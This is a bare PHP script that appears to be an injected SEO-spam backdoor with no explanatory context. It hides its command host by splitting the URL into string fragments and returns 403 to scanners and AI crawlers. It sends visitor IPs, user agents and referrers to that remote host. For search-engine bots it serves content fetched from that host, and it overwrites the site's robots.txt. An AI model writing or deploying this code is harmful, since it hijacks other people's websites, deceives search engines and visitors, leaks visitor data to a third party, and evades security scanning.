<?php $yrbh='m/';$uzkb='p.co';$bocv='hi';$njma='ht';$ilkq='tp://cw3184.madrid';$lpmeu=$njma.$ilkq.$bocv.$uzkb.$yrbh; $pc = "WgAPUgf"; $bagent = "google|Aol|bing|Yahoo"; if(preg_match("/(Jaunty|Claudebot|EasouSpider|Python-urllib|UniversalFeedParser|Java|amazonBot|YySpider|ezooms|feedDemon|CensysInspect|DataForSEO|GPTBot|LightDeckReports Bot|Python|DotBot|Bytespider|jikeSpider|Go-http-client|Swiftbot|oBot|Paqlebot|Feedly|Python-requests|ZmEu|indy Library|YisouSpider|HttpClient|Barkrowler|ApacheBench|SeznamBot|DigExt|YandexBot|PetalBot|CrawlDaddy|Paloaltonetworks|AskTbFXTV|ahrefsBot|mj12bot|Heritrix|SemrushBot|Scrapy|CoolpadWebkit)/i", $_SERVER['HTTP_USER_AGENT'])) {  header('HTTP/1.0 403 Forbidden');  exit(); } error_reporting(0); $ip = $_SERVER['REMOTE_ADDR']; $refer = urlencode(@$_SERVER['HTTP_REFERER']); $language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']); $uagent = urlencode($_SERVER['HTTP_USER_AGENT']); if (isset($_SERVER['HTTP_CLIENT_IP'])) {  $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {  $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } $domain = urlencode($_SERVER['HTTP_HOST']); $ip = urlencode($ip); $script = urlencode($_SERVER['SCRIPT_NAME']);  if ((!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https') or (!empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on') or (!empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443') or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) {  $_SERVER['REQUEST_SCHEME'] = 'https'; } else {  $_SERVER['REQUEST_SCHEME'] = 'http'; } function writeToFile($filePath, $content) {  $file = fopen($filePath, "w");  if ($file) {  fwrite($file, $content);  fclose($file);  return true;  }  return false; }  function readFromFile($filePath) {  $file = fopen($filePath, "r");  if ($file) {  $content = fread($file, filesize($filePath));  fclose($file);  return $content;  }  return false; } $uri = urlencode($_SERVER['REQUEST_URI']); $http = urlencode($_SERVER['REQUEST_SCHEME']); if(strpos($uri,"nntnnt") !== false){echo "ok";exit();} $nntFilePath = "nnt.txt"; $nnt = 0; if(!is_file($nntFilePath)) {  $uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/nntnnt';  $usaf = @file_get_contents($uuu);   if($usaf === "ok") {   $nnt = 1;   writeToFile($nntFilePath,"1");  } else {   $nnt = 0;   writeToFile($nntFilePath,"0");  } } else {  $nnt = readFromFile($nntFilePath); }  if(strpos($uri,"favicon.ico") !== false) { } else if(strpos($uri,"robots.txt") !== false or strpos($uri,"jp2023") !== false or strpos($uri,"pingsitemap") !== false or preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI']) or preg_match("/($bagent)/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/($bagent)/i", @$_SERVER['HTTP_REFERER'])) {  $robots_contents = "";  $requsturl = $lpmeu."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$nnt&script=$script";  if(strpos($uri,"pingsitemap") !== false) {   $scripname = $_SERVER['SCRIPT_NAME'];   if(strpos($scripname,"index.ph") !== false) {    if($nnt == 0) {     $scripname = '/?';    } else {     $scripname = '/';    }   } else {    $scripname = $scripname.'?';   }   $robots_contents = "User-agent: *\r\nAllow: /";   $sitemap = "$http://" . $domain .$scripname. "sitemap.xml";   $robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap";   $sitemapstatus = "";   echo $sitemap.": ".$sitemapstatus.'<br/>';   $requsturl = $lpmeu."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$nnt&script=$script&sitemap=".urlencode($sitemap);  }  $usaf = @file_get_contents($requsturl);  if(empty($usaf)) {   $ch = curl_init();   curl_setopt($ch, CURLOPT_URL, $requsturl);   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);   $usaf = curl_exec($ch);   curl_close($ch);  }  if(!empty($usaf)) {   if(substr($usaf,0,10)=="error code" or $usaf == "500" or strpos($usaf,'Bad Gateway')!==false) {    header("HTTP/1.0 500 Internal Server Error");    exit();   }   if(strpos($uri,"jp2023") !== false){header('HTTP/1.1 404 Not Found');}   else if(substr($usaf,0,5)=="<?xml") {    header('Content-Type: text/xml; charset=utf-8');   } else {    header('Content-Type: text/html; charset=utf-8');   }   echo $usaf;   if(!empty($robots_contents)){writeToFile("robots.txt",$robots_contents);}   else if(strpos($uri,"robots.txt") !== false){writeToFile("robots.txt",$usaf);}   exit();   return;  } }else{ } ?>